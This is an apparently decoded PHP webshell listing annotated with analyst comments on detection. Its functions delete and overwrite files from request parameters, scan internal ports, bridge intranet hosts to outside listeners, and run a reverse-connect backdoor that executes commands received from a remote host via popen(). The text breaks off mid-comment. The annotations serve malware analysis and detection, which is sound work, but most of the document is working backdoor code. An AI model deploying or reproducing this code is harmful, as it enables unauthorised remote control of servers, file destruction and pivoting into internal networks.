PHP Decode
<?php session_start(); error_reporting(E_ALL); function read_file($file_name) { $fp = f..
Decoded Output download
<?php
// Opens a PHP session; aio_shell() below appends command output to $_SESSION['output'].
session_start();
// Report every PHP error level.
error_reporting(E_ALL);
/**
 * Echo a file's contents to the response, one fgets() chunk (up to 1023 bytes) at a time.
 *
 * @file_name - path handed directly to fopen(); nothing here validates or confines it.
 *
 * Returns 0 on success, -1 when fopen() fails. Output is echoed without HTML escaping.
 * The loop ends on a loose `!= false` test, so a chunk equal to "0" also stops it.
 */
function read_file($file_name)
{
$fp = fopen($file_name, "r");
if ($fp == false) {
echo "open $file_name failed.
";
return -1;
}
while (($buf = fgets($fp, 1024)) != false ) {
echo $buf;
}
fclose($fp);
return 0;
}
/**
 * Copy a file chunk by chunk with fgets()/fwrite().
 *
 * @src_file - source path, opened read-only.
 * @dst_file - destination path, opened "w+" (created or truncated).
 *
 * Returns 0 on success, -1 on any open or write failure. A failed open of the
 * destination returns -1 without printing a message. Neither path is validated.
 */
function copy_file($src_file, $dst_file)
{
$src_fp = fopen($src_file, "r");
if ($src_fp == false) {
echo "open $src_file failed.
";
return -1;
}
$dst_fp = fopen($dst_file, "w+");
if ($dst_fp == false) {
fclose($src_fp);
return -1;
}
while (($buf = fgets($src_fp, 1024)) != false) {
if (fwrite($dst_fp, $buf, strlen($buf)) == false) {
echo "fwrite failed.
";
fclose($src_fp);
fclose($dst_fp);
return -1;
}
}
fclose($src_fp);
fclose($dst_fp);
return 0;
}
/**
 * Copy a file with PHP's built-in copy().
 *
 * @src_file - source path; must exist.
 * @dst_file - destination path.
 *
 * Returns 0 on success, -1 if the source is missing or copy() fails.
 * The failure message interpolates $src, which is never defined in this
 * function, so the source name is missing from that message.
 */
function copy_file_binary($src_file, $dst_file)
{
if (file_exists($src_file) == false) {
echo "file $src_file not exist.
";
return -1;
}
if (copy($src_file, $dst_file) == false) {
echo "copy $src to $dst_file failed.
";
return -1;
}
echo "copy $src_file to $dst_file ok.
";
return 0;
}
/**
 * Delete a single file with unlink().
 *
 * @file_name - path to remove; used as given, with no allow-list or directory check.
 *
 * Returns 0 on success, -1 if the file is missing or unlink() fails.
 *
 * Analyst note: aio_main() passes $_GET['delete'] straight into this function,
 * so any request carrying a `delete=` parameter can remove files the web
 * server account may write to. The name is echoed back without HTML escaping.
 */
function delete_file($file_name)
{
if (file_exists($file_name) == false) {
echo "file $file_name not exist.";
return -1;
}
if (unlink($file_name) == false) {
echo "delete $file_name failed.";
return -1;
}
echo "delete $file_name ok.
";
return 0;
}
/**
 * Show or overwrite a file in the current working directory.
 *
 * @file_path - requested path; only its basename() is used, so the target is
 *              always resolved relative to the script's working directory.
 *
 * Without a non-empty POST field `newcontent`, the file is read and printed
 * inside a <textarea> (no HTML escaping). With it, the file is opened "w+"
 * and replaced by the POST body. All file calls are silenced with `@`.
 *
 * Analyst note: aio_main() calls this with $_GET['edit'], so a single request
 * can rewrite any writable file next to the script, including other PHP
 * files. Unexpected modification times on files in the web root are a
 * useful integrity signal for this behaviour.
 */
function edit_file($file_path)
{
$file_name = basename($file_path);
if (empty($_POST['newcontent'])) {
echo '<form action="" method="post">';
$fp=@fopen($file_name, "r");
$data=@fread($fp, filesize($file_name));
echo '<textarea name="newcontent" cols="80" rows="20" >';
echo $data;
@fclose($fp);
echo '</textarea>
<input type="submit" value="Edit"/>
</form>';
}
else {
$fp=@fopen($file_name, "w+");
$result=@fwrite($fp, $_POST['newcontent']);
@fclose($fp);
if ($result == false) {
echo "edit failed.";
}
else {
echo "edit ok.";
}
}
}
/**
 * Rename (or move) a file with rename().
 *
 * @old_file_name - existing path; must exist.
 * @new_file_name - new path.
 *
 * Returns 0 on success, -1 if the source is missing or rename() fails.
 * Neither path is validated; both are echoed without HTML escaping.
 */
function rename_file($old_file_name, $new_file_name)
{
if (file_exists($old_file_name) == false) {
echo "file $old_file_name not exist.
";
return -1;
}
if (rename($old_file_name, $new_file_name) == false) {
echo "rename $old_file_name to $new_file_name failed.
";
return -1;
}
echo "rename $old_file_name to $new_file_name ok.
";
return 0;
}
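/**
 * Convert a byte count into a short human-readable string.
 *
 * @bytes - size in bytes (int or float).
 *
 * Returns the value divided by 1024 per unit step, truncated to an integer,
 * followed by the unit name, e.g. "2 KB". Sizes of 1024 TB and above stay in
 * TB instead of indexing past the end of the unit table.
 */
function get_human_size($bytes)
{
    $type = array("Bytes", "KB", "MB", "GB", "TB");
    $last = count($type) - 1;
    $idx = 0;
    // Stop at the largest known unit so $type[$idx] is always defined.
    while ($bytes >= 1024 && $idx < $last) {
        $bytes /= 1024;
        $idx++;
    }
    return (intval($bytes)." ".$type[$idx]);
}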
/**
 * Return the last four octal digits of a file's mode, e.g. "0644".
 *
 * @file_name - path passed to fileperms().
 */
function get_file_perms($file_name)
{
    $octal_mode = sprintf('%o', fileperms($file_name));
    return substr($octal_mode, -4);
}
/**
 * Render a file's mode in `ls -l` form, e.g. "-rwxr-xr-x".
 *
 * @file_name - path passed to fileperms().
 *
 * The first character is the file type ('u' when no known type mask matches);
 * the remaining nine are the owner/group/other triplets, with s/S and t/T
 * marking the setuid, setgid and sticky bits.
 */
function get_human_file_perms($file_name)
{
    $perms = fileperms($file_name);

    // File-type masks, tested in this exact order; the first full match wins.
    $type_masks = array(
        0xC000 => 's',
        0xA000 => 'l',
        0x8000 => '-',
        0x6000 => 'b',
        0x4000 => 'd',
        0x2000 => 'c',
        0x1000 => 'p',
    );
    $info = 'u';
    foreach ($type_masks as $mask => $letter) {
        if (($perms & $mask) == $mask) {
            $info = $letter;
            break;
        }
    }

    // Per class: read bit, write bit, execute bit, special bit,
    // letter when special+execute are set, letter when only special is set.
    $classes = array(
        array(0x0100, 0x0080, 0x0040, 0x0800, 's', 'S'),
        array(0x0020, 0x0010, 0x0008, 0x0400, 's', 'S'),
        array(0x0004, 0x0002, 0x0001, 0x0200, 't', 'T'),
    );
    foreach ($classes as $c) {
        $info .= ($perms & $c[0]) ? 'r' : '-';
        $info .= ($perms & $c[1]) ? 'w' : '-';
        if ($perms & $c[2]) {
            $info .= ($perms & $c[3]) ? $c[4] : 'x';
        } else {
            $info .= ($perms & $c[3]) ? $c[5] : '-';
        }
    }
    return $info;
}
/**
 * Return the account name of a file's owner.
 *
 * @file_name - path passed to fileowner(); the uid is resolved with posix_getpwuid().
 */
function get_file_owner($file_name)
{
    $owner_record = posix_getpwuid(fileowner($file_name));
    return $owner_record['name'];
}
/**
 * Print the path of every entry in a directory (non-recursive).
 *
 * @dir_path - directory to list; "." and ".." are skipped.
 *
 * Returns 0, or -1 when opendir() fails.
 * closedir($dp) sits outside the is_dir() branch, so it also runs with an
 * undefined $dp when @dir_path is not a directory.
 */
function read_dir($dir_path)
{
if (is_dir($dir_path)) {
if (($dp = opendir($dir_path)) == false) {
echo "open $dir_path failed.
";
return -1;
}
while (($file_name = readdir($dp)) != false) {
if ($file_name == "." || $file_name == "..")
continue;
$sub_path = $dir_path."/".$file_name;
echo "$sub_path
";
}
}
closedir($dp);
return 0;
}
/**
 * Render an HTML file-manager table for a directory.
 *
 * @dir_path - directory to list.
 *
 * Returns 0, or -1 when opendir() fails.
 *
 * Each row shows name, a timestamp, size, octal and symbolic mode and owner,
 * plus action links to `webshell.php` with `delete=`, `edit=`, `download=`
 * and `rename=` query parameters. Only `delete` and `edit` have handlers in
 * aio_main() in this listing.
 *
 * Behaviour worth knowing when analysing output:
 *  - the stat calls use the bare $file_name, not $sub_path, so values are
 *    resolved relative to the current working directory;
 *  - the "Last modified" column is filled from fileatime(), i.e. access time;
 *  - file names are written into the HTML and the unquoted href without escaping.
 *
 * Analyst note: the hard-coded script name and these query parameter names
 * are what would appear in web access logs when the table's links are used.
 */
function read_dirs($dir_path)
{
echo '
<table>
<tr class="banner">
<td width="400" >Filename</td>
<td width="400" >Last modified</td>
<td width="400" >Size</td>
<td width="400" >Chmod/Perms</td>
<td width="400" >Action</td>
</tr>';
if (is_dir($dir_path)) {
if (($dp = opendir($dir_path)) == false) {
echo "open $dir_path failed.
";
return -1;
}
while (($file_name = readdir($dp)) != false) {
if ($file_name == "." || $file_name == "..")
continue;
$sub_path = $dir_path."/".$file_name;
$last_modify_time=date("Y/m/d H:i:s", fileatime($file_name));
$file_size=filesize($file_name);
$file_size_string=get_human_size($file_size);
$file_perms=get_file_perms($file_name);
$file_perms_string=get_human_file_perms($file_name);
$file_owner=get_file_owner($file_name);
echo '<tr class="directory">
<td width="400" ><a href='.$file_name.'>'.$file_name.'</a></td>
<td width="400" >'.$last_modify_time.'</td>
<td width="400" >'.$file_size_string.'</td>
<td width="400" >'.$file_perms.' / '.$file_perms_string.' / '.$file_owner.'</td>
<td width="400" ><a href="webshell.php?delete='.$file_name.'"'.'>Delete </a>
<a href="webshell.php?edit='.$file_name.'"'.'>Edit </a>
<a href="webshell.php?download='.$file_name.'"'.'>Download </a>
<a href="webshell.php?rename='.$file_name.'"'.'>Rename </a>
</td>
</tr>';
}
}
echo '</table>';
closedir($dp);
return 0;
}
/**
 * Render the file-manager table for the script's current working directory.
 *
 * Returns whatever read_dirs() returns. Reached from aio_main() via `cmd=dir`.
 */
function aio_directory()
{
$curr_path=getcwd();
return read_dirs($curr_path);
}
/**
 * Recursively look for an entry with an exact name under a directory.
 *
 * @dir_path    - directory to start from.
 * @target_file - entry name compared with strcmp().
 *
 * Returns 0 when a match is found directly in @dir_path, otherwise -1.
 * The return value of the recursive call is ignored, so a match found in a
 * subdirectory is only reported by the echoed "found" line, and a
 * "not found" line is printed for every directory without a direct match.
 */
function search_file_by_name($dir_path, $target_file)
{
if (is_dir($dir_path)) {
if (($dp = opendir($dir_path)) == false) {
echo "open $dir_path failed.
";
return -1;
}
while (($file_name = readdir($dp)) != false) {
if ($file_name == "." || $file_name == "..")
continue;
$sub_path = $dir_path."/".$file_name;
if (is_dir($sub_path)) {
search_file_by_name($sub_path, $target_file);
}
if (!strcmp($file_name, $target_file)) {
echo "found $target_file.
";
closedir($dp);
return 0;
}
}
echo "not found $target_file.
";
closedir($dp);
}
return -1;
}
/**
* show files that have a certain attribute flag.
*
* @dir_path - directory to search.
* @attr_flag - 0 readable.
* - 1 writeable.
* - 2 executable.
*/
function show_attr_file($dir_path, $attr_flag)
{
// Walks $dir_path recursively and prints the path of each entry that passes
// the check selected by $attr_flag. Returns 0, or -1 when opendir() fails.
// The is_readable()/is_writable()/is_executable() checks are given the bare
// $file_name rather than $sub_path, so they are resolved relative to the
// current working directory, not the directory being walked.
// Analyst note: listing writable locations is typical pre-staging
// reconnaissance; the output shows where the web server account can write.
if (is_dir($dir_path)) {
if (($dp = opendir($dir_path)) == false) {
echo "open $dir_path failed.
";
return -1;
}
while (($file_name = readdir($dp)) != false) {
if ($file_name == "." || $file_name == "..")
continue;
$sub_path = $dir_path."/".$file_name;
if (is_dir($sub_path)) {
show_attr_file($sub_path, $attr_flag);
}
if ($attr_flag == 0) {
if (is_readable($file_name))
echo "$sub_path
";
}
else if ($attr_flag == 1) {
if (is_writable($file_name))
echo "$sub_path
";
}
else if ($attr_flag == 2) {
if (is_executable($file_name))
echo "$sub_path
";
}
else {
echo "wrong attribute flag.
";
break;
}
}
closedir($dp);
}
return 0;
}
/**
 * Create a directory with mode 0700.
 *
 * @dir_path - path to create; refused (returns -1, no message) if it already exists.
 *
 * Returns 0 on success, -1 otherwise.
 */
function create_dir($dir_path)
{
if (file_exists($dir_path))
return -1;
if (mkdir($dir_path, 0700) == false) {
echo "create $dir_path failed.
";
return -1;
}
echo "create $dir_path ok.
";
return 0;
}
/**
 * Remove a single directory with rmdir().
 *
 * @dir_path - directory to remove.
 *
 * Returns 0 on success, -1 if the path does not exist (no message) or rmdir() fails.
 */
function destroy_dir($dir_path)
{
if (file_exists($dir_path) == false)
return -1;
if (rmdir($dir_path) == false) {
echo "delete $dir_path failed.
";
return -1;
}
echo "delete $dir_path ok.
";
return 0;
}
/**
 * Recursively delete a directory tree.
 *
 * @dir_path - root of the tree; files go through delete_file(), directories
 *             through a recursive call and then destroy_dir().
 *
 * Returns 0 in every case except a failed opendir() on @dir_path (-1).
 * Failures of the nested delete calls are not propagated to the caller.
 */
function destroy_dirs($dir_path)
{
if (is_dir($dir_path)) {
if (($dp = opendir($dir_path)) == false) {
echo "open $dir_path failed.
";
return -1;
}
while (($file_name = readdir($dp)) != false) {
if ($file_name == "." || $file_name == "..")
continue;
$sub_path = $dir_path."/".$file_name;
if (is_dir($sub_path)) {
destroy_dirs($sub_path);
}
else
delete_file($sub_path);
}
closedir($dp);
destroy_dir($dir_path);
return 0;
}
return 0;
}
/**
 * Print an `id`-style line for the account PHP is running as.
 *
 * Uses posix_getuid() and posix_getpwuid(); prints uid, gid, home directory
 * and login shell. The name shown in parentheses after the gid is the user
 * name again, not a group name.
 */
function linux_id()
{
$uid = posix_getuid();
$user_info = posix_getpwuid($uid);
echo "uid=".$uid."(".$user_info['name'].") ";
echo "gid=".$user_info['gid']."(".$user_info['name'].") ";
echo "dir=".$user_info['dir']." ";
echo "shell=".$user_info['shell']."
";
}
/**
 * Print a `uname -a`-style line built from posix_uname():
 * sysname, nodename, release, version and machine.
 */
function linux_uname()
{
$uname = posix_uname();
echo $uname['sysname']." ".$uname['nodename']." ".$uname['release']." ";
echo $uname['version']." ".$uname['machine'];
}
/**
 * Extract the process name from a /proc/<pid>/status style file.
 *
 * @file_name - path to read (linux_ps() passes "/proc/<pid>/status").
 *
 * Returns the second whitespace-separated token of the first line containing
 * "Name:", 0 when no such line is found, or -1 when the file cannot be opened.
 */
function get_proc_name($file_name)
{
$fp = fopen($file_name, "r");
if ($fp == false) {
echo "open $file_name failed.
";
return -1;
}
while (($buf = fgets($fp, 1024)) != false ) {
if (strstr($buf, "Name:") != NULL) {
sscanf($buf, "%s %s", $tmp, $name);
fclose($fp);
return $name;
}
}
fclose($fp);
return 0;
}
/**
 * Read the first chunk (up to 1023 bytes) of a /proc/<pid>/cmdline style file.
 *
 * @file_name - path to read (linux_ps() passes "/proc/<pid>/cmdline").
 *
 * Returns the string from fgets() (false when the file is empty), or -1 when
 * the file cannot be opened.
 */
function get_proc_cmd($file_name)
{
$fp = fopen($file_name, "r");
if ($fp == false) {
echo "open $file_name failed.
";
return -1;
}
$cmd = fgets($fp, 1024);
fclose($fp);
return $cmd;
}
/**
 * Print a process list by walking /proc.
 *
 * For every all-digit entry under /proc it prints the pid, the name from
 * get_proc_name() and the command line from get_proc_cmd().
 *
 * Returns 0, or -1 when /proc cannot be opened.
 *
 * Analyst note: this reads /proc directly, so no `ps` child process is
 * spawned; process-creation telemetry alone will not show this enumeration.
 */
function linux_ps()
{
if (($dp = opendir("/proc")) == false) {
echo "open /proc failed.
";
return -1;
}
echo "open /proc ok.
";
while (($file_name = readdir($dp)) != false) {
if ($file_name == "." || $file_name == "..")
continue;
if (ctype_digit($file_name) == false)
continue;
$dir_path = "/proc/$file_name/status";
$proc_name = get_proc_name($dir_path);
$dir_path = "/proc/$file_name/cmdline";
$proc_cmd = get_proc_cmd($dir_path);
echo $file_name." ".$proc_name." ".$proc_cmd."
";
}
closedir($dp);
return 0;
}
/**
 * Open a blocking IPv4 TCP connection with the sockets extension.
 *
 * @host - destination address.
 * @port - destination port.
 *
 * Returns the connected socket, or -1 on failure. Connection errors are
 * silenced with `@`; only a socket_create() failure prints a message.
 */
function tcp_connect($host, $port)
{
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($socket == false) {
echo "create socket error.
";
return -1;
}
if (@socket_connect($socket, $host, $port) == false) {
socket_close($socket);
return -1;
}
return $socket;
}
/**
 * Open an IPv4 TCP connection with a coarse timeout.
 *
 * @host    - destination address.
 * @port    - destination port.
 * @timeout - seconds to keep retrying.
 *
 * The socket is switched to non-blocking mode and socket_connect() is retried
 * once per second while the error code is 115 or 114 (EINPROGRESS / EALREADY
 * on Linux). Any other error aborts immediately.
 *
 * Returns the socket (still non-blocking) on success, -1 on failure or timeout.
 */
function tcp_connect_timeout($host, $port, $timeout)
{
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($socket == false) {
echo "create socket error.
";
return -1;
}
if (socket_set_nonblock($socket) == false) {
echo "set nonblock error.
";
socket_close($socket);
return -1;
}
$time = time();
while (!@socket_connect($socket, $host, $port)) {
$err = socket_last_error($socket);
if ($err == 115 || $err == 114) {
if ((time() - $time) >= $timeout) {
socket_close($socket);
echo "socket timeout.
";
return -1;
}
sleep(1);
continue;
}
socket_close($socket);
return -1;
}
echo "connect to $host:$port ok.
";
return $socket;
}
/**
 * Connect out to two endpoints and relay traffic between them.
 *
 * @remote_host1, @remote_port1 - first endpoint.
 * @remote_host2, @remote_port2 - second endpoint.
 *
 * Both connections are made with tcp_connect(); the pair is then handed to
 * run_proxy_core(), which blocks until either side fails or closes.
 *
 * Returns 0 after the relay ends, -1 if either connection fails.
 *
 * Analyst note: because both legs are outbound from the web server, this can
 * bridge a host reachable only from the server to an external listener.
 * Restricting outbound connections from the web tier removes that path, and
 * long-lived outbound TCP sessions owned by the PHP worker are the artefact
 * to look for.
 */
function run_proxy_client($remote_host1, $remote_port1, $remote_host2, $remote_port2)
{
$socket1 = tcp_connect($remote_host1, $remote_port1);
if ($socket1 == -1) {
echo "connect to $remote_host1:$remote_port1 failed.
";
return -1;
}
echo "connect to $remote_host1:$remote_port1 ok.
";
$socket2 = tcp_connect($remote_host2, $remote_port2);
if ($socket2 == -1) {
echo "connect to $remote_host2:$remote_port2 failed.
";
socket_close($socket1);
return -1;
}
echo "connect to $remote_host2:$remote_port2 ok.
";
run_proxy_core($socket1, $remote_host1, $socket2, $remote_host2);
return 0;
}
/**
 * Web front end for the relay: prints a form and, when all four POST fields
 * are present, starts run_proxy_client().
 *
 * POST fields read: intranet_host, intranet_port, public_host, public_port.
 * They are passed on without validation. Returns -1 when any field is empty;
 * otherwise falls off the end (no explicit return value).
 *
 * Reached from aio_main() / webshell_main() via `cmd=proxy`.
 * Analyst note: these four field names in a POST body, and the page heading
 * "Linux reverse proxy", are fixed strings in this sample.
 */
function web_proxy_client()
{
echo '<html><head><style>
h3.banner
{
text-align:center;
color:#384850;
font-weight:bold;
}
form
{
text-align:center;
}
input[type=text]
{
width:300px;
color:#384850;
background-color:#ffffff;
}
input[type=submit]
{
width:80px;
color:#384850;
background-color:#ffffff;
}
</head></style>
<body>
<h3 class="banner">Linux reverse proxy</h3>
<form action="" method="post">
<b>intranet host</b>
<input type="text" name="intranet_host" />
<b>intranet port</b>
<input type="text" name="intranet_port" /><br />
<b>public host</b>
<input type="text" name="public_host" />
<b>public port</b>
<input type="text" name="public_port" /><br /><br />
<input type="submit" value="Run" />
</form>
</body>
</html>';
if (empty($_POST['intranet_host']) || empty($_POST['intranet_port']) ||
empty($_POST['public_host']) || empty($_POST['public_port']))
return -1;
run_proxy_client($_POST['intranet_host'], $_POST['intranet_port'],
$_POST['public_host'], $_POST['public_port']);
}
/**
 * Relay loop: copy data in both directions between two connected sockets.
 *
 * @socket1, @socket2           - connected sockets.
 * @remote_host1, @remote_host2 - labels used only in messages.
 *
 * Each pass calls socket_select() with a timeout of 0, so the loop polls
 * continuously rather than sleeping until data arrives. Up to 1024 bytes are
 * read from whichever socket is readable and sent to the other with MSG_EOR.
 * Any error, empty read or short send ends the loop; both sockets are then
 * closed and 0 is returned.
 *
 * Details visible in the code:
 *  - the third socket_select() argument is $except, which is never assigned
 *    ($except_sockets is the variable set to NULL);
 *  - `$bytes == false` is a loose test that is also true for 0, so the
 *    following `== 0` branch cannot be reached.
 *
 * NOTE(review): in this decoded listing the "\n" escapes appear to have been
 * expanded into real line breaks (compare the "Original Code" listing on the
 * same page). The lone `";` lines that follow the `//echo` comments are
 * therefore most likely decoder artefacts and this copy may not parse as
 * shown -- confirm against the original before relying on it.
 *
 * Analyst note: a PHP worker pinned at high CPU with two open TCP sockets is
 * consistent with this polling loop.
 */
function run_proxy_core($socket1, $remote_host1, $socket2, $remote_host2)
{
while (true) {
$read_sockets = array($socket1, $socket2);
$write_sockets = NULL;
$except_sockets = NULL;
if (socket_select($read_sockets, $write_sockets, $except, 0) == -1) {
echo "socket_select error ".socket_strerror(socket_last_error())."
";
break;
}
if (in_array($socket2, $read_sockets)) {
//echo "got data from $remote_host2.
";
$bytes2 = socket_recv($socket2, $buf2, 1024, MSG_DONTWAIT);
if ($bytes2 == false) {
echo "socket_recv ".socket_strerror(socket_last_error($socket2))."
";
break;
}
//echo "got bytes $bytes2.
";
if ($bytes2 == 0) {
echo "recv no data from $remote_host2.
";
break;
}
$ret2 = socket_send($socket1, $buf2, $bytes2, MSG_EOR);
if ($ret2 == false) {
echo "socket_send ".socket_strerror(socket_last_error($socket1))."
";
break;
}
if ($ret2 != $bytes2) {
echo "send data failed.
";
break;
}
//echo "write $ret2 bytes ok.
";
}
if (in_array($socket1, $read_sockets)) {
//echo "got data from $remote_host1.
";
$bytes1 = socket_recv($socket1, $buf1, 1024, MSG_DONTWAIT);
if ($bytes1 == false) {
echo "socket_recv ".socket_strerror(socket_last_error($socket1))."
";
break;
}
//echo "got bytes $bytes1.
";
if ($bytes1 == 0) {
echo "recv no data from $remote_host1.
";
break;
}
$ret1 = socket_send($socket2, $buf1, $bytes1, MSG_EOR);
if ($ret1 == false) {
echo "socket_send ".socket_strerror(socket_last_error($socket2))."
";
break;
}
if ($ret1 != $bytes1) {
echo "send data failed.
";
break;
}
//echo "write $ret1 bytes ok.
";
}
}
echo "proxy done.
";
socket_close($socket1);
socket_close($socket2);
return 0;
}
/**
 * Create a listening IPv4 TCP socket.
 *
 * @local_port - port to bind.
 *
 * Binds to the address string '0' (presumably all interfaces -- confirm) and
 * calls socket_listen() with the default backlog.
 *
 * Returns the listening socket, or -1 on any failure.
 */
function init_proxy_server($local_port)
{
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($socket == false) {
echo "create socket error.
";
return -1;
}
if (socket_bind($socket, '0', $local_port) == false) {
echo "bind sock error.
";
socket_close($socket);
return -1;
}
if (socket_listen($socket) == false) {
echo "listen sock error.
";
socket_close($socket);
return -1;
}
echo "listen on port $local_port ok.
";
return $socket;
}
/**
 * Listen on two local ports, accept one client on each, and relay between them.
 *
 * @local_port1, @local_port2 - ports to listen on, in that order.
 *
 * The second listener is only created after a client has connected to the
 * first. If creating the second listener fails, -1 is returned without
 * closing the first listener or its accepted client. Returns 0 after
 * run_proxy_core() finishes.
 *
 * No caller is visible in this listing.
 * Analyst note: a web server worker owning listening sockets on ports other
 * than the HTTP(S) ports is the observable artefact.
 */
function run_proxy_server($local_port1, $local_port2)
{
$socket1 = init_proxy_server($local_port1);
if ($socket1 == -1)
return -1;
while (true) {
if (($newsock1 = socket_accept($socket1)) !== false) {
socket_getpeername($newsock1, $ip1);
echo "got a client form $ip1
";
break;
}
}
$socket2 = init_proxy_server($local_port2);
if ($socket2 == -1)
return -1;
while (true) {
if (($newsock2 = socket_accept($socket2)) !== false) {
socket_getpeername($newsock2, $ip2);
echo "got a client form $ip2
";
break;
}
}
echo "start transmit data ...
";
run_proxy_core($newsock2, $ip2, $newsock1, $ip1);
socket_close($socket2);
socket_close($socket1);
return 0;
}
/**
 * Thin wrapper around fsockopen() used by the port scanners.
 *
 * @host, @port - destination.
 * @timeout     - connect timeout in seconds, as passed to fsockopen().
 *
 * Returns the stream on success or false on failure; warnings are silenced
 * with `@` and $errno/$errstr are discarded.
 */
function tcp_connect_port($host, $port, $timeout)
{
$fp = @fsockopen($host, $port, $errno, $errstr, $timeout);
return $fp;
}
/**
 * Probe a fixed list of well-known TCP ports on one host and print the open ones.
 *
 * @host    - target address (run_portscan() passes $_POST['scan_host'] unvalidated).
 * @timeout - per-port connect timeout in seconds.
 * @banner  - when non-empty, read up to 127 bytes from each open port and print them.
 *
 * Ports are tried sequentially with tcp_connect_port(). Host, port label and
 * any banner bytes are written into the HTML table without escaping, so
 * whatever the remote service sends is rendered by the viewer's browser.
 *
 * Analyst note: the scan originates from the web server, so it reaches hosts
 * the server can reach, including internal ones. In network telemetry it
 * shows up as short sequential connection attempts from the PHP worker to
 * this port set on a single destination.
 */
function port_scan_fast($host, $timeout, $banner)
{
$general_ports = array(
'21'=>'FTP',
'22'=>'SSH',
'23'=>'Telnet',
'25'=>'SMTP',
'79'=>'Finger',
'80'=>'HTTP',
'81'=>'HTTP/Proxy',
'110'=>'POP3',
'135'=>'MS Netbios',
'139'=>'MS Netbios',
'143'=>'IMAP',
'162'=>'SNMP',
'389'=>'LDAP',
'443'=>'HTTPS',
'445'=>'MS SMB',
'873'=>'rsync',
'1080'=>'Proxy/HTTP Server',
'1433'=>'MS SQL Server',
'2433'=>'MS SQL Server Hidden',
'1521'=>'Oracle DB Server',
'1522'=>'Oracle DB Server',
'3128'=>'Squid Cache Server',
'3129'=>'Squid Cache Server',
'3306'=>'MySQL Server',
'3307'=>'MySQL Server',
'3500'=>'Squid Cache Server',
'3389'=>'MS Terminal Service',
'5800'=>'VNC Server',
'5900'=>'VNC Server',
'8080'=>'Proxy/HTTP Server',
'10000'=>'Webmin',
'11211'=>'Memcached'
);
echo '<table>';
foreach($general_ports as $port=>$name) {
if (($fp = tcp_connect_port($host, $port, $timeout)) != false) {
if (empty($banner) == false) {
$data = fgets($fp, 128);
echo '<tr>
<td>'.$host.'</td>
<td>'.$port.'</td>
<td>'.$name.'</td>
<td>'.$data.'</td>
</tr>';
}
else {
echo '<tr>
<td>'.$host.'</td>
<td>'.$port.'</td>
<td>'.$name.'</td>
</tr>';
}
fclose($fp);
}
}
echo '</table>';
}
/**
 * Probe a contiguous TCP port range on one host and print the open ports.
 *
 * @host               - target address.
 * @src_port, @dst_port - first and last port, inclusive.
 * @timeout            - per-port connect timeout in seconds.
 * @banner             - when non-empty, print up to 127 bytes read from each
 *                       open port instead of the word OPEN.
 *
 * Ports are tried one at a time, so a closed or filtered port can cost up to
 * @timeout seconds each. Output is not HTML-escaped.
 */
function port_scan($host, $src_port, $dst_port, $timeout, $banner)
{
echo '<table>
<tr>
<td>Host</td>
<td>Port</td>
<td>State</td>
</tr>';
for ($port = $src_port; $port <= $dst_port; $port++) {
if (($fp = tcp_connect_port($host, $port, $timeout)) != false) {
if (empty($banner) == false) {
$data = fgets($fp, 128);
echo '<tr>
<td>'.$host.'</td>
<td>'.$port.'</td>
<td>'.$data.'</td>
</tr>';
}
else {
echo '<tr>
<td>'.$host.'</td>
<td>'.$port.'</td>
<td>OPEN</td>
</tr>';
}
fclose($fp);
}
}
echo '</table>';
}
/**
 * Web front end for the port scanners.
 *
 * POST fields read: scan_host, scan_timeout, scan_fast (checkbox),
 * scan_banner (checkbox). Returns -1 when scan_host is empty.
 *
 * With scan_fast set, port_scan_fast() is used; otherwise port_scan() is run
 * over ports 1 to 65535. scan_timeout and scan_banner are read without an
 * isset() check and passed on unvalidated.
 *
 * Reached via `cmd=portscan`.
 * Analyst note: a full-range run issues tens of thousands of sequential
 * outbound connects from the PHP worker to one address and keeps the request
 * open for its whole duration; both are visible in flow logs and in web
 * server request-duration metrics.
 */
function run_portscan()
{
echo '<html>
<head>
<style>
tr.directory
{
font-size:14px;
text-align:left;
height:20px;
border:1px solid #98bf21;
padding:2px 6px 2px 6px;
}
</style>
</head>
<body>
<form action="" method="post">
target host
<input type="text" name="scan_host" value="127.0.0.1" />
timeout
<input type="text" name="scan_timeout" value="5" />
general ports
<input type="checkbox" name="scan_fast" />
banner
<input type="checkbox" name="scan_banner" />
<input type="submit" value="scan" />
</form>
</body>
</html>';
if (empty($_POST['scan_host']))
return -1;
if (isset($_POST['scan_fast'])) {
port_scan_fast($_POST['scan_host'], $_POST['scan_timeout'],
$_POST['scan_banner']);
}
else {
port_scan($_POST['scan_host'], "1", "65535",
$_POST['scan_timeout'],
$_POST['scan_banner']);
}
}
/**
 * Run a command line through popen() and write its output to a socket.
 *
 * @socket - connected socket that receives the command's stdout.
 * @cmd    - string handed to popen() unchanged; in this file it is whatever
 *           bytes were just read from the network peer.
 *
 * Returns 0 when the output has been forwarded, -1 when a socket_write()
 * fails (in that case the popen() handle is not closed).
 *
 * Analyst note: this is the command-execution primitive behind both
 * backdoor modes. On the host it appears as the web server / PHP process
 * spawning a shell child, which is rarely legitimate and a high-value
 * process-lineage detection.
 */
function linux_exec($socket, $cmd)
{
$handle = popen($cmd, "r");
while (($buf = fgets($handle, 1024)) != false) {
$ret = socket_write($socket, $buf, strlen($buf));
if ($ret == false) {
return -1;
}
}
pclose($handle);
return 0;
}
/**
 * Reverse-connect command channel.
 *
 * @host, @port - remote endpoint to connect to (run_backdoor() passes the
 *                POST fields target_host / target_port unvalidated).
 *
 * After connecting with tcp_connect() it sends a fixed banner line, then
 * loops forever: read up to 1024 bytes from the socket, echo them to the
 * HTTP response, and execute them via linux_exec(). There is no
 * authentication and no exit condition; a failed or empty socket_read() is
 * not checked. Returns -1 if the connection or the banner write fails.
 *
 * Analyst note: the banner text sent on connect is a fixed string in this
 * sample and can serve as a network content signature. The connection is
 * outbound from the web server, so egress filtering on the web tier is the
 * control that blocks it.
 */
function connect_backdoor($host, $port)
{
$banner = "connect back from phpshell
";
$socket = tcp_connect($host, $port);
if ($socket == -1) {
echo "connect to $host:$port failed.
";
return -1;
}
echo "connect to $host:$port ok.
";
$ret = socket_write($socket, $banner, strlen($banner));
if ($ret == false) {
echo "write data failed.
";
socket_close($socket);
return -1;
}
while (true) {
$buf = socket_read($socket, 1024);
echo $buf;
linux_exec($socket, $buf);
}
}
/**
 * Listening command channel.
 *
 * @local_port - port to bind (run_backdoor() passes POST field bind_port unvalidated).
 *
 * Binds an IPv4 TCP socket to the address string '0' (presumably all
 * interfaces -- confirm), accepts the first client, sends a fixed banner
